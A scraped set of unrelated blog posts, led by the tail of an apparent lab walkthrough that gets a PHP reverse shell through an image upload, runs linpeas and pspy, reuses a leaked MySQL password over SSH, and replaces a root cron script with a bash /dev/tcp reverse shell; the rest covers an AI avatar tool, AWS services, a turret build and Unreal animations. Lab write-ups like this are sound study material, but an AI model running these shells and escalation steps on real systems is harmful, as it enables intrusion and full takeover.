From here, go to google and search for **"php reverse shell"**

Click on the one from pentestmonkey github

Click on php-reverse-shell.php

Click on **Raw**
Now copy everything by pressing the **ctrl A** and **ctrl C** on your keyboard and save it as a file named **shell.php**.
To save the file, input the command:
```
nano shell.php
```
Now paste all that you have copied.
NB- Scroll down and find where you can see **CHANGE THIS**

Change the IP address to your attacking machine's IP address (not the academy IP address)
You can leave the port number as it is as 1234.
Once that has been changed, save the file.
Now input the command:
```
nc -nvlp 1234
```
Once you've entered that command, upload the shell.php file in the image-upload field and click on update to make sure the change has been saved.
No image will be displayed but you would have gotten a shell on your listener.

The image above shows the listener before the image upload

The image above shows the listener after the image upload.
We have successfully popped a shell.
To find out who we are on the machine, we input the command:
```
whoami
```

We are a low-level user known as **www-data**, so our job here is not done; we do not have superuser privileges, so we need to find a way to escalate to a superuser such as admin or root.
To do that we are going to use a tool called "linpeas".
LinPEAS is an automated tool that helps us search for any sort of privilege escalation path.
To use linpeas visit the website "https://linpeas.sh/"

Now we need to copy everything seen on the linpeas page and save it in a file.
To do that we use **"ctrl A"** to mark all and **"ctrl C"** to copy.
Then we need to **open a new tab** on our **kali** and use **nano** to paste what we copied and save it.
To save my linpeas file I created a new directory called "transfer" and saved the linpeas there.
NB- you can choose to create a new directory if you wish, or just save the file in your current directory.
To save the linpeas file we copied from the webpage, we input the command:
```
nano linpeas.sh
```
and then we paste the copied text and save the file.

The file has been saved on our local device, so now we need to find a way to send the linpeas.sh file into the remote shell we accessed in which we are the www-data user.
To do that we need to host a web-server in the directory where the linpeas file was saved and use wget to get the file.
So on the tab where the linpeas file is saved, input the command:
```
python3 -m http.server 80
```

Now move back to the www-data user tab and cd into the tmp folder using the command:
```
cd tmp
```
so as to have the file saved in the tmp folder, now we input the command below to get the linpeas file:
```
wget http://192.168.59.131/linpeas.sh
```

Now we need to make the file executable and we do that by using the command:
```
chmod +x linpeas.sh
```

and now we run the linpeas file using the command:
```
./linpeas.sh
```
There are lots of things to scroll through after running the above command, but what stands out and calls for our attention is a file it shows us, along with a password, as shown in the image below:

From the image above we can spot this:
```
/var/www/html/academy/admin/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";
/var/www/html/academy/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";
```
The /var/www/html/academy/includes/ is a directory and config.php is a file, so to check the content of the file we input the command:
```
cat /var/www/html/academy/includes/config.php
```
and we get the following response as shown in the image below:

The image above shows us that there's a SQL user named **grimmie** with a password of **My_V3ryS3cur3_P4ss**.
So now we open a new tab and try logging into the machine as grimmie using SSH with the command:
```
ssh grimmie@192.168.59.134
```
If it asks you about a fingerprint input the command **yes**
For the password input:
```
My_V3ryS3cur3_P4ss
```

We have successfully logged in as grimmie.
According to the output of `cat /etc/passwd`, grimmie is an administrator on the machine.

Grimmie is an administrator, and yet we still do not have sudo (superuser) privileges after inputting the command:
```
sudo -l
```

So our work here isn't done.
After inputting the command
```
ls
```
and
```
cat backup.sh
```

What we can see is that there's a script running a periodic backup. We'd like to know how often the backup occurs, because we plan on editing the script to run a particular command for us; we need to know whether the backup runs hourly, daily, weekly, or on some other schedule.
First we input the command:
```
crontab -l
```

From the results, grimmie does not have access to crontab. If grimmie had access to crontab, we would have been able to edit how frequently the backup takes place; we plan on running a script as soon as possible and would not like to wait until a particular day or week before the script can execute.
Also we can use the command:
```
systemctl list-timers
```
to see if any script is running on a timer, but from the output we cannot find any.

When we have a situation like this we can use a tool called **pspy**.
pspy is a tool that gives us more information about what processes are running than the system has shown us so far.
To download pspy, we search google for pspy and select the one seen from the image below.

Scroll down and download the 64 bit pspy

The pspy64 binary should be located in your Downloads folder on Kali. Locate it, host a web server in the directory that contains pspy64, and use wget in grimmie's tab to fetch it.
After locating the directory that contains the pspy64 (which should be your downloads folder), input the command in that directory:
```
python3 -m http.server 80
```

and in grimmie's tab, move into the tmp folder using the command `cd /tmp` so the file is saved there, then input the command:
```
wget http://192.168.59.131/pspy64
```
Now that the pspy64 file has been downloaded, we need to make it executable by using the command:
```
chmod +x pspy64
```

Now we execute the file using the command:
```
./pspy64
```
After a while we can see that the backup.sh file is actually running in the background

The backup is programmed to run every minute, which is good news for us. Now we can move on to editing the backup script.

The image above is a confirmation of the time it takes for the backup script to run.
Now we need to go back to our directory that has the backup file.
To do that we input the command:
```
cd /home/grimmie
```
Now we go to google and search for **bash reverse shell one liner**
Select the one from pentestmonkey as shown below

The image below shows the bash we need, it is a one line reverse shell script.

Now copy the script which is:
```
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```
and change the 10.0.0.1 to your attacker/local machine, remember mine is 192.168.59.131, so mine would look like this:
```
bash -i >& /dev/tcp/192.168.59.131/8080 0>&1
```
First we need to set up a listener and to set that up, we open a new tab and use the command:
```
nc -nvlp 8080
```
After setting up the listener we need to edit the backup.sh script to our bash one liner script.
To do that we go back to our grimmie tab and input the command:
```
nano backup.sh
```
Clear the backup script and input the one liner script just as shown in the image below.

and save the file.
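If you prefer not to open an editor on the target, the same edit can also be done non-interactively. A small sketch (using the example IP and port from this walkthrough):

```shell
# Overwrite backup.sh with the reverse-shell one-liner
# (192.168.59.131:8080 are the example values used in this walkthrough)
cat > backup.sh <<'EOF'
#!/bin/bash
bash -i >& /dev/tcp/192.168.59.131/8080 0>&1
EOF

# Keep the script executable so the scheduled job can still run it
chmod +x backup.sh
cat backup.sh
```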

Within a minute, while waiting for the file to execute, we got a root shell.

Congratulations!
We have successfully rooted the machine.
| babsarena | |
1,878,599 | V-Express: 1-Click AI Avatar Talking Heads Video Animation Generator - D-ID Alike - Open Source | V-Express: 1-Click AI Avatar Talking Heads Video Animation Generator — D-ID Alike — Free Open... | 0 | 2024-06-06T01:07:33 | https://dev.to/furkangozukara/v-express-1-click-ai-avatar-talking-heads-video-animation-generator-d-id-alike-open-source-1kj8 | beginners, tutorial, ai, learning | <p style="margin-left:0px;"><a target="_blank" rel="noopener noreferrer" href="https://youtu.be/xLqDTVWUSec"><u>V-Express: 1-Click AI Avatar Talking Heads Video Animation Generator — D-ID Alike — Free Open Source</u></a></p>
<p style="margin-left:0px;">Tutorial link : <a target="_blank" rel="noopener noreferrer" href="https://youtu.be/xLqDTVWUSec"><u>https://youtu.be/xLqDTVWUSec</u></a></p>
<p style="margin-left:auto;"> </p>
<p style="margin-left:auto;">{% embed https://youtu.be/xLqDTVWUSec %}</p>
<p style="margin-left:auto;"> </p>
<p style="margin-left:0px;">Ever wished your static images could talk like magic? Meet V-Express, the groundbreaking open-source and free tool that breathes life into your photos! Whether you have an audio clip or a video, V-Express animates your images to create stunning talking avatars. Just like the acclaimed D-ID Avatar, Wav2Lip, and Avatarify, V-Express turns your still photos into dynamic, speaking personas, but with a twist — it’s completely open-source and free to use! With seamless audio integration and the ability to mimic video expressions, V-Express offers an unparalleled experience without any cost or restrictions. Experience the future of digital avatars today — let’s dive into how you can get started with V-Express and watch your images come alive!</p>
<p style="margin-left:0px;">1-Click V-Express Installers Scripts ⤵️<br><a target="_blank" rel="noopener noreferrer" href="https://www.patreon.com/posts/105251204"><u>https://www.patreon.com/posts/105251204</u></a></p>
<p style="margin-left:0px;">Requirements Step by Step Tutorial ⤵️<br><a target="_blank" rel="noopener noreferrer" href="https://youtu.be/-NjNy7afOQ0"><u>https://youtu.be/-NjNy7afOQ0</u></a></p>
<p style="margin-left:0px;">Massed Compute Register and Login ⤵️<br><a target="_blank" rel="noopener noreferrer" href="https://vm.massedcompute.com/signup?linkId=lp_034338&sourceId=secourses&tenantId=massed-compute"><u>https://vm.massedcompute.com/signup?linkId=lp_034338&sourceId=secourses&tenantId=massed-compute</u></a></p>
<p style="margin-left:0px;">Official V-Express GitHub Repository ⤵️<br><a target="_blank" rel="noopener noreferrer" href="https://github.com/tencent-ailab/V-Express"><u>https://github.com/tencent-ailab/V-Express</u></a></p>
<p style="margin-left:0px;">SECourses Discord Channel to Get Full Support ⤵️<br><a target="_blank" rel="noopener noreferrer" href="https://discord.com/servers/software-engineering-courses-secourses-772774097734074388"><u>https://discord.com/servers/software-engineering-courses-secourses-772774097734074388</u></a></p>
<p style="margin-left:0px;">0:00 Introduction to the V-Express with demo showcase<br>1:23 The features of the V-Express talking avatars app<br>2:02 How to download and install V-Express on Windows<br>3:29 Which requirements are necessary and how to install and verify them<br>4:56 How to uninstall my scripts installed apps<br>5:35 How to save installation logs to send me in case of any error<br>6:05 How to start using V-Express Gradio app after installation and the settings of the app<br>8:14 Explanation of auto cropping<br>9:05 Generating first example video and how much VRAM it is using and how much time it is taking<br>10:57 The location of where generated videos are saved</p>
<p style="margin-left:0px;">Transforming Static Images into Dynamic Videos: A Comprehensive Guide<br>In the evolving landscape of digital content creation, transforming static images into dynamic, talking avatars is no longer a complex task reserved for professionals. With advancements in AI technology, applications like Tencent AI Lab’s V-Express, D-ID, and other commercial tools have made this process accessible to everyone. This article delves into the functionalities of these applications, focusing on how they can be utilized to create engaging video content from static images, thereby enhancing your content’s SEO and overall impact.</p>
<p style="margin-left:0px;">Introduction to Tencent AI Lab V-Express<br>Tencent AI Lab V-Express is an innovative open-source application designed to convert static images into talking avatars. This tool supports both audio and video inputs, making it versatile for various content creation needs. Here’s a step-by-step guide on how to install and use V-Express on Windows.</p>
<p style="margin-left:0px;">Installation Guide<br>Preparation: Download the V-Express zip files and demo images from the provided links. Avoid using space characters in folder names to prevent path handling issues.<br>Extraction: Extract the downloaded zip files into your chosen directory.<br>Installation: Double-click the windows_install.bat file. This will install the application into a virtual environment, ensuring it doesn’t conflict with other applications.<br>Configuration: Verify the installation of Python 3.10.11, Git, FFmpeg, CUDA 11.8, and C++ tools by running specific commands in CMD.<br>Execution: Once installed, double-click the windows_start.bat file to start the application.<br>Using V-Express<br>Upload: Upload a static image and an audio or video file.<br>Settings: Configure settings like retarget strategy, video width, and height, VRAM usage, and face focus expansion.<br>Generation: Click generate to create the video. The application will save the output in the specified folder.<br>Exploring D-ID and Other Commercial Apps<br>D-ID<br>D-ID is a commercial application known for its advanced capabilities in transforming static images into videos. It offers features like:</p>
<p style="margin-left:0px;">Realistic Animations: Creates highly realistic talking avatars.<br>Customization: Allows users to customize facial expressions and movements.<br>Ease of Use: User-friendly interface suitable for non-technical users.<br>Other Notable Apps<br>Synthesia: Specializes in creating AI-generated videos with human-like avatars. It’s widely used for corporate training and marketing.<br>Reallusion iClone: Offers robust tools for 3D animation and character creation, making it ideal for professional animators.<br>DeepBrain: Focuses on converting text to speech with animated avatars, perfect for educational content.</p>
<p style="margin-left:auto;">
<img class="image_resized" style="height:auto;width:680px;" src="https://miro.medium.com/v2/resize:fit:1313/1*L7dA6pzWpIODenomOZE4TQ.png" alt="" width="700" height="394">
</p>
1,867,076 | AWS multi-region Serverless application variant. | Multi-Region applications comes in very handy when you want to deal with users from different... | 0 | 2024-06-06T01:04:41 | https://dev.to/asankab/aws-multi-region-serverless-application-variant-2348 | serverless, multiregion, apigateway, lambda | Multi-Region applications comes in very handy when you want to deal with users from different geographical locations, eliminating latency issue depending on distance from the place where your users accesses your application and also helps in maintaining High-Availability and DR (Disaster Recovery) situations without disrupting your users in case of a regions downtime from your cloud service provider.

**Below is a brief summary of the services used for the below variant.**
- **Route53**: Amazon Route 53 is a scalable and highly available Domain Name System (DNS) web service designed to route end-user requests to internet applications by translating domain names into IP addresses. It also provides domain registration and DNS health checks, and integrates seamlessly with other AWS services.
- **API Gateway**: AWS API Gateway is a fully managed service that enables developers to create, publish, secure, and monitor RESTful and WebSockets APIs at scale. It seamlessly integrates with AWS services like Lambda, provides robust security features, and scales automatically to handle varying traffic loads.
- **Lambda**: AWS Lambda is a Serverless compute service that allows you to run code without provisioning or managing servers. You can execute code in response to events such as changes in data, shifts in system state, or user actions, and it automatically manages the compute resources required.
- **DynamoDB**: Amazon DynamoDB is a fully managed NoSQL database service that provides fast and predictable performance with seamless scalability. It is designed to handle large amounts of structured data and enables developers to offload the administrative burdens of operating and scaling distributed databases.
- **Amazon Macie**: Amazon Macie is a fully managed data security and data privacy service that uses machine learning and pattern matching to discover, monitor, and protect sensitive data stored in Amazon S3. It helps you identify and safeguard your personally identifiable information (PII) and intellectual property, providing visibility into how this data is accessed and moved across your organization.
- **Secrets Manager**: AWS Secrets Manager is a service designed to help you protect access to your applications, services, and IT resources without the upfront cost and complexity of managing your own hardware security module (HSM) or physical infrastructure. It allows you to securely store, manage, and retrieve credentials, API keys, and other secrets through a centralized and secure service, providing fine-grained access control and auditing capabilities.
- **CloudWatch**: Amazon CloudWatch is a monitoring and management service designed for developers, system operators, site reliability engineers (SREs), and IT managers. It provides data and actionable insights to monitor applications, understand and respond to system-wide performance changes, optimize resource utilization, and get a unified view of operational health.
_Thank you for your time._ | asankab |
1,878,598 | The Base and Rotation | YOO, WHAT is up guys. I don't know if you remember the base I made in the second post. Well, I 3D... | 0 | 2024-06-06T01:02:18 | https://dev.to/kevinpalma21/the-base-and-rotation-2k6i | design, webdev, beginners, learning |
YOO, WHAT is up guys.
I don't know if you remember the base I made in the second post. Well, I 3D printed that one (Image 1), and it was an okay base overall, but it wasn't deep enough. I made some tweaks to this base. I used the SolidEdit function and chose to stretch the top part of this object. This made it lengthier in the Z direction, which is what I wanted. I also used the fillet edge function to make the sides a bit curvier(Image 2).
(Image 1)
(image 2)
I also wanted to add a feature to this turret. I wanted to add a camera to detect the faces of people and determine who it would shoot. It will be shooting these yellowish Nerf balls, so I need some sort of place to store them. The round diameter is about 14.5 mm(Image 3). I have linked a YouTube video for all the specs on the balls I will be using.
(Image 3)
Youtube video:https://www.youtube.com/watch?v=vaA_xTaRa7I&t=135s
I was also coming up with some ideas on how to proceed with getting the thing to start turning. I plan to design and 3D print another part to facilitate the turret's movement. I want to really get all these pieces first before programming and really making progress on this.
My next step will be making some gears and hopefully not messing up too badly. But AYY F**K it, we ball. Still quite a long way from the finished product.

But that is a sneak peek of what is in store. For now, the biggest question is making IT ROTATE. I need this thing to be able to do a 360. So, time to start throwing ideas and just running it down main.
Well, this is the update I have so far, and next time, hopefully, I am able to solve this whole rotating problem. Thank you once again for reading this, and if y'all have any ideas, comment them down below. | kevinpalma21 |
1,878,597 | Spinomenal granted Croatia iGaming certification | Spinomenal has been granted its certification for the Croatian iGaming market, operators within... | 0 | 2024-06-06T00:51:12 | https://dev.to/jashteen98/spinomenal-granted-croatia-igaming-certification-3ge | Spinomenal has been granted its certification for the Croatian iGaming market, operators within Croatia are now able to gain access to and offer Spinomenal’s suite of HTML5 slots content. Spinomenal games portfolio includes Book of Demi Gods II, Western Tales and Lucky Jack – Tut’s Treasures.
Croatia follows quickly on the back of the Spanish B2B certification and joins an impressive list of iGaming certifications; these markets provide a framework for Spinomenal’s business objectives.
Spinomenal’s CEO, Lior Shvartz, commented: “Our target is to make our standout content widely available across the top performing iGaming markets. We’ve identified the Croatian market as one of big potential and we are pleased to secure our certification.”
[Online casino site](https://www.casinositetop.com/) , [Legal casino site](https://www.casinositetop.com/)
| jashteen98 | |
1,878,595 | Inspired signs virtual sports contract with Novibet | Inspired Entertainment has signed a multi-market contract to launch its Virtual Sports content with... | 0 | 2024-06-06T00:49:55 | https://dev.to/jashteen98/inspired-signs-virtual-sports-contract-with-novibet-4ep8 |
Inspired Entertainment has signed a multi-market contract to launch its Virtual Sports content with Novibet. Starting with the Greek market, Inspired’s Virtual Sports are now hosted in a dedicated section on novibet.gr, offering customized and localized Virtual Sports options to players on a 24/7/365 basis.
Inspired’s Virtual Sports are delivered via the company’s Virtual Plug & Play solution, which allows Novibet’s members to access multiple Virtual Sports, including soccer, basketball and horse racing, served through a player interface. Novibet has launched Inspired’s Greek Matchday Soccer League, featuring 16 teams playing a league season of virtual soccer.
Brooks Pierce, president and chief operating officer said: “Novibet is a leading online gaming operator and has been a long-standing customer of Inspired’s on the iGaming side.”
“We are very excited to further enhance their online portfolio to include our award-winning Virtual Sports and we look forward to working together to grow their brand across Europe.”
Thanasis Gkiokas, sports manager at Novibet said: “We have enjoyed working with Inspired to create custom Virtual Sports offerings that are specifically tailored to fully satisfy our members, such as Inspired’s exclusive Greek Matchday Soccer League.”
[Online casino site](https://www.casinosite.one/)
| jashteen98 | |
1,878,594 | My Game Recommendation Program | Program Showcase Code File Explanation Data File The Data File... | 0 | 2024-06-06T00:43:18 | https://dev.to/carterwr/my-game-recommendation-software-27pk | ## Program Showcase
{% embed https://youtu.be/Uw4t6-4ZoBU %}
## Code File Explanation
### Data File
* The Data [File](https://github.com/CarterWr/Recommendation-Software/blob/main/data.py) is just the data set I hand-made by researching different game categories and popular games within them.
### Tree Structure
* The data structure I used to store the data is a very simple [tree](https://github.com/CarterWr/Recommendation-Software/blob/main/Tree_struct.py) that has one method, add child to node, and two attributes: value (what the node stores) and children (a list of the node's children).
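A minimal sketch of that tree structure, with names inferred from the description above (not copied from the repository):

```python
class Tree:
    """A very simple tree node: one method, two attributes."""

    def __init__(self, value):
        self.value = value      # what the node stores
        self.children = []      # the node's children

    def add_child(self, node):
        """Attach another Tree node as a child of this one."""
        self.children.append(node)


# Example: a tiny genre tree like the game-category data described above
root = Tree("Games")
shooters = Tree("Shooters")
root.add_child(shooters)
shooters.add_child(Tree("DOOM"))
print(root.children[0].value)  # → Shooters
```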
### Main File
* The main [file](https://github.com/CarterWr/Recommendation-Software/blob/main/main.py) is where the execution happens. There isn't a lot of code here, just a call to the main caller function.
### Functions File
* This is where all the magic happens: the functions [file](https://github.com/CarterWr/Recommendation-Software/blob/main/functions.py). It contains most of the code used in this project; for example, this is where the tree objects that store all of the data are initialized. Most of the code in this file is docstringed, so I won't go into what each function does. If you're curious, go check it out.
Git Hub Repository Link: [here](https://github.com/CarterWr/Recommendation-Software/tree/main)
| carterwr | |
1,878,593 | Understanding Microservices Architecture | Introduction Microservices architecture is gaining popularity among businesses as it... | 0 | 2024-06-06T00:31:57 | https://dev.to/kartikmehta8/understanding-microservices-architecture-3278 | webdev, javascript, beginners, programming | ## Introduction
Microservices architecture is gaining popularity among businesses as it provides several advantages over traditional monolithic architecture. It is an architectural style that breaks down a large software system into small, independent, and modular services, each with its own specific function. These services communicate with each other through well-defined APIs and can be deployed and managed independently. In this article, we will dive into the understanding of microservices architecture, its advantages, disadvantages, and key features.
## Advantages of Microservices
1. **Scalability:** Microservices allow for easier scalability as each service can be scaled independently based on its usage and demand.
2. **Flexibility:** This architecture allows for flexibility in development, as different services can be built using different technologies and languages.
3. **Easy Maintenance:** Since each microservice is independent, it is easier to maintain and update without affecting the entire system.
4. **Cost-effective:** Microservices allow businesses to save costs by only paying for the specific services that are used, rather than the entire system.
## Disadvantages of Microservices
1. **Complex architecture:** Implementing microservices architecture requires expertise and can be complex to design and maintain.
2. **Increased communication overhead:** With multiple services communicating with each other, there is a potential increase in network traffic and communication overhead.
## Key Features of Microservices Architecture
1. **Decentralized:** Microservices architecture follows a decentralized approach where there is no central database or control.
2. **Independent Deployment:** Each service can be deployed independently, making it easier to make changes without affecting the entire system.
### Example of Independent Deployment
Here's an example of how a microservice can be deployed independently using Docker, a popular containerization platform:
```bash
# Build the Docker image for the microservice
docker build -t my-microservice .
# Run the microservice in a new container
docker run -p 4000:4000 my-microservice
```
This example demonstrates the ease of deploying a microservice independently, allowing for updates and maintenance without downtime for the entire system.
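To extend the sketch, a hypothetical two-service layout (service names, paths, and ports are invented for illustration) could be described with Docker Compose, letting each service be built, scaled, and redeployed on its own:

```yaml
version: "3.8"
services:
  users-service:        # hypothetical service handling user accounts
    build: ./users
    ports:
      - "4000:4000"
  orders-service:       # hypothetical service handling orders
    build: ./orders
    ports:
      - "4001:4001"
```

Because each service has its own build context and port, one can be updated and restarted without touching the other, which is the independence property described above.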
## Conclusion
Microservices architecture offers several advantages, such as scalability, flexibility, and cost-effectiveness. However, it also brings in challenges such as complexity and increased communication overhead. Understanding the architecture and carefully considering its implementation is crucial for businesses to reap its benefits and overcome its challenges. Overall, microservices architecture is a revolutionary approach that is transforming the way software systems are designed, developed, and deployed. | kartikmehta8 |
1,878,592 | Optimising Your Cloud Spend: Top Strategies for AWS Cost Management | Visit my blog PracticalCloud for more indepth cloud computing articles. In today's cloud-driven... | 0 | 2024-06-06T00:22:55 | https://practicalcloud.net/optimising-your-cloud-spend-top-strategies-for-aws-cost-management/ | aws, cloud, devops | Visit my blog [PracticalCloud](https://practicalcloud.net) for more indepth cloud computing articles.
In today's cloud-driven world, businesses are increasingly migrating to AWS to leverage its scalability, agility, and wide range of services. However, managing cloud costs effectively is essential to ensure you're getting the most out of your AWS investment. In this article, we will explore several key strategies for optimizing your AWS costs and maximizing your return on investment (ROI).
## Understanding AWS Pricing
Before diving into cost optimization strategies, it’s crucial to understand how AWS pricing works. AWS uses a pay-as-you-go model, which means you only pay for the services you use. However, the complexity of AWS pricing can make cost management challenging. Here are the main components to consider:
1. **Compute Costs:** Charges for virtual servers (EC2 instances), Lambda executions, etc.
2. **Storage Costs:** Charges for data storage (S3, EBS, etc.) and data transfer.
3. **Data Transfer Costs:** Charges for data moving in and out of AWS.
4. **Miscellaneous Costs:** Charges for additional services like RDS, CloudFront, etc.
## Top Strategies for AWS Cost Management
### 1. Right-Sizing Your Instances

Right-sizing involves matching instance types and sizes to your workload’s needs. Over-provisioning resources leads to unnecessary costs, while under-provisioning can impact performance.

**How to Right-Size:**

- **Analyze Usage Patterns:** Use AWS CloudWatch and Cost Explorer to analyze your instance usage and performance.
- **Choose the Right Instance Types:** AWS offers various instance types optimized for different workloads (compute-optimized, memory-optimized, etc.).
- **Utilize Auto Scaling:** Set up Auto Scaling to automatically adjust capacity to maintain steady, predictable performance at the lowest possible cost.
### 2. Leverage AWS Savings Plans and Reserved Instances

AWS offers Savings Plans and Reserved Instances (RIs) for long-term commitments, which can significantly reduce costs.

**Savings Plans vs. Reserved Instances:**

- **Savings Plans:** Flexible pricing plans offering savings over On-Demand pricing, applicable across any region and instance family.
- **Reserved Instances:** Offer significant discounts (up to 75%) compared to On-Demand pricing in exchange for a commitment to use AWS for a 1- or 3-year term.

**How to Use Them:**

- **Analyze Historical Usage:** Use Cost Explorer to identify stable workloads that can benefit from long-term commitments.
- **Choose the Right Plan:** Based on your usage pattern, select either a Compute Savings Plan or an EC2 Instance Savings Plan.
- **Regular Review:** Periodically review and adjust your reservations to match your evolving workload.
### 3. Utilize Spot Instances

Spot Instances offer unused EC2 capacity at up to 90% discount compared to On-Demand prices. They are ideal for flexible, stateless, and fault-tolerant workloads.

**Best Practices for Spot Instances:**

- **Spot Fleet:** Use Spot Fleet to automate the allocation and management of Spot Instances.
- **Instance Interruption Handling:** Implement fault-tolerant design patterns to handle potential Spot Instance interruptions.
- **Combine with On-Demand and RIs:** Use a mix of Spot, On-Demand, and Reserved Instances for optimal cost savings and reliability.
### 4. Monitor and Optimize Storage Costs

Storage costs can quickly escalate if not properly managed. AWS provides tools and best practices to optimize storage expenses.

**Strategies for Storage Optimization:**

- **S3 Lifecycle Policies:** Automate transitioning of objects to lower-cost storage classes (e.g., from S3 Standard to S3 Glacier) based on their lifecycle.
- **Delete Unused Data:** Regularly audit and delete unused or old data.
- **Optimize EBS Volumes:** Identify and delete unused EBS volumes, and take advantage of EBS volume types that best match your performance and cost needs.
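As an illustration of an S3 Lifecycle policy, a configuration like the following (the rule ID, prefix, and day counts are example values, not recommendations) transitions objects to cheaper storage classes over time and eventually expires them:

```json
{
  "Rules": [
    {
      "ID": "archive-old-logs",
      "Filter": { "Prefix": "logs/" },
      "Status": "Enabled",
      "Transitions": [
        { "Days": 30, "StorageClass": "STANDARD_IA" },
        { "Days": 90, "StorageClass": "GLACIER" }
      ],
      "Expiration": { "Days": 365 }
    }
  ]
}
```

A configuration of this shape can be applied to a bucket with `aws s3api put-bucket-lifecycle-configuration`, after which S3 moves matching objects automatically with no further action on your part.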
### 5. Implement Cost Allocation and Tagging

Cost allocation and tagging allow you to track and manage AWS costs by associating them with different departments, projects, or teams.

**How to Implement Tagging:**

- **Define a Tagging Strategy:** Establish a consistent tagging strategy across your organization.
- **Use AWS Cost Allocation Tags:** Tag resources with cost allocation tags to categorize and track costs.
- **Leverage Cost Explorer and AWS Budgets:** Use these tools to analyze tagged resources and monitor spending.
### 6. Use AWS Cost Management Tools

AWS provides several tools to help you manage and optimize your cloud spend:

- **AWS Cost Explorer:** Visualize, understand, and manage your AWS costs and usage over time.
- **AWS Budgets:** Set custom cost and usage budgets and receive alerts when you exceed them.
- **AWS Trusted Advisor:** Provides real-time guidance to help you optimize your AWS infrastructure, improve security, and reduce costs.

## Scenario-Based Cost Optimization Examples
## Scenario 1: Seasonal Traffic Spikes

**Problem:** An e-commerce website experiences high traffic during holiday seasons.

**Solution:** Use Auto Scaling to automatically adjust the number of instances based on traffic. Leverage Spot Instances during peak hours to save costs and Reserved Instances for baseline capacity.

## Scenario 2: Development and Testing Environments

**Problem:** Development and testing environments are running 24/7, leading to high costs.

**Solution:** Implement start/stop schedules for non-production instances using AWS Instance Scheduler. Use Spot Instances for testing workloads that can tolerate interruptions.

## Scenario 3: Data Analytics and Big Data Processing

**Problem:** High costs associated with big data processing.

**Solution:** Use S3 Lifecycle policies to move old data to cheaper storage classes. Leverage Spot Instances for data processing jobs. Use Amazon Athena for cost-effective querying of data stored in S3.
Optimizing AWS costs is crucial for maximizing the value of your cloud investment. By understanding AWS pricing and employing strategies such as right-sizing, leveraging Savings Plans and Spot Instances, monitoring storage costs, implementing cost allocation and tagging, and using AWS cost management tools, you can significantly reduce your cloud spend. Regularly review and adjust your strategies to align with your evolving workloads and business needs. With these best practices, you'll be well on your way to mastering AWS cost management. | kelvinskell |
1,878,590 | Case Study: Ignoring Nonalphanumeric Characters When Checking Palindromes | Palindrome.java, here considered all the characters in a string to check whether it is a palindrome.... | 0 | 2024-06-06T00:15:31 | https://dev.to/paulike/case-study-ignoring-nonalphanumeric-characters-when-checking-palindromes-34n9 | java, programming, learning, beginners | Palindrome.java, [here](https://dev.to/paulike/case-studies-on-loops-27l1) considered all the characters in a string to check whether it is a palindrome. Write a new program that ignores nonalphanumeric characters in checking whether a string is a palindrome.
Here are the steps to solve the problem:
1. Filter the string by removing the nonalphanumeric characters. This can be done by creating an empty string builder, adding each alphanumeric character in the string to a string builder, and returning the string from the string builder. You can use the **isLetterOrDigit(ch)** method in the **Character** class to check whether character **ch** is a letter or a digit.
2. Obtain a new string that is the reversal of the filtered string. Compare the reversed string with the filtered string using the **equals** method.
The complete program is shown below.
```
package demo;

import java.util.Scanner;

public class PalindromeIgnoreNonAlphanumeric {

  public static void main(String[] args) {
    // Create a Scanner
    Scanner input = new Scanner(System.in);

    // Prompt the user to enter a string
    System.out.print("Enter a string: ");
    String s = input.nextLine();

    // Display result
    System.out.println("Ignoring nonalphanumeric characters, \nis " + s + " a palindrome? " + isPalindrome(s));
  }

  /** Return true if a string is a palindrome */
  public static boolean isPalindrome(String s) {
    // Create a new string by eliminating nonalphanumeric chars
    String s1 = filter(s);

    // Create a new string that is the reversal of s1
    String s2 = reverse(s1);

    // Check if the reversal is the same as the original string
    return s2.equals(s1);
  }

  /** Create a new string by eliminating nonalphanumeric chars */
  public static String filter(String s) {
    // Create a string builder
    StringBuilder stringBuilder = new StringBuilder();

    // Examine each char in the string, skipping nonalphanumeric chars
    for (int i = 0; i < s.length(); i++) {
      if (Character.isLetterOrDigit(s.charAt(i))) {
        stringBuilder.append(s.charAt(i));
      }
    }

    // Return a new filtered string
    return stringBuilder.toString();
  }

  /** Create a new string by reversing a specified string */
  public static String reverse(String s) {
    StringBuilder stringBuilder = new StringBuilder(s);
    stringBuilder.reverse(); // Invoke reverse in StringBuilder
    return stringBuilder.toString();
  }
}
```
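To sanity-check the same logic without typing input on each run, here is a small self-contained variant (the class name and sample strings are mine, not part of the original listing):

```java
// A compact sketch mirroring the article's filter/reverse approach.
public class PalindromeDemo {

  public static boolean isPalindrome(String s) {
    String filtered = filter(s);
    String reversed = new StringBuilder(filtered).reverse().toString();
    return reversed.equals(filtered);
  }

  /** Keep only letters and digits */
  public static String filter(String s) {
    StringBuilder sb = new StringBuilder();
    for (int i = 0; i < s.length(); i++) {
      if (Character.isLetterOrDigit(s.charAt(i))) {
        sb.append(s.charAt(i));
      }
    }
    return sb.toString();
  }

  public static void main(String[] args) {
    System.out.println(isPalindrome("race car!")); // true
    System.out.println(isPalindrome("hello"));     // false
  }
}
```

Note that the comparison is case-sensitive, just like the original program, so a mixed-case phrase such as "Madam, I'm Adam" would return false unless the filtered string were lower-cased first.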
The **filter(String s)** method examines each character in string **s** and copies it to a string builder if the character is a letter or a digit. The **filter** method returns the string in the builder. The **reverse(String s)** method creates a new string that reverses the specified string **s**. The **filter** and **reverse** methods both return a new string; the original string is not changed.
The program in the linked post above checks whether a string is a palindrome by comparing pairs of characters from both ends of the string. The program above uses the **reverse** method in the **StringBuilder** class to reverse the string, then compares whether the two strings are equal to determine whether the original string is a palindrome. | paulike |
1,878,589 | [Game of Purpose] Day 18 - making flying animations | Today I followed up a second part of a flying tutorial, where I added animations. I have to say that... | 27,434 | 2024-06-06T00:12:01 | https://dev.to/humberd/game-of-purpose-day-18-making-flying-animations-2d38 | gamedev | Today I followed up a [second part of a flying tutorial](https://www.youtube.com/watch?v=XOdR5DRsiz0), where I added animations.
I have to say that the tutorial was too fast. The author just told you what to click and where, without even explaining what was going on. So let me be clear about what happened:
1. First I imported custom Akai character model from [mixamo.com](https://www.mixamo.com).
2. Then I imported Floating and Flying animations also from [mixamo.com](https://www.mixamo.com).
3. Then I created an **IK Rig** for both Manny (my current character) and Akai (the imported one), where I used their skeletal meshes to mark body parts. I selected the elements responsible for moving the Spine, Head, Left Arm, Right Arm, Left Leg and Right Leg and named them accordingly. I think this was important because the internal structure looks different between these 2 models, and this step marks the parts they have in common.

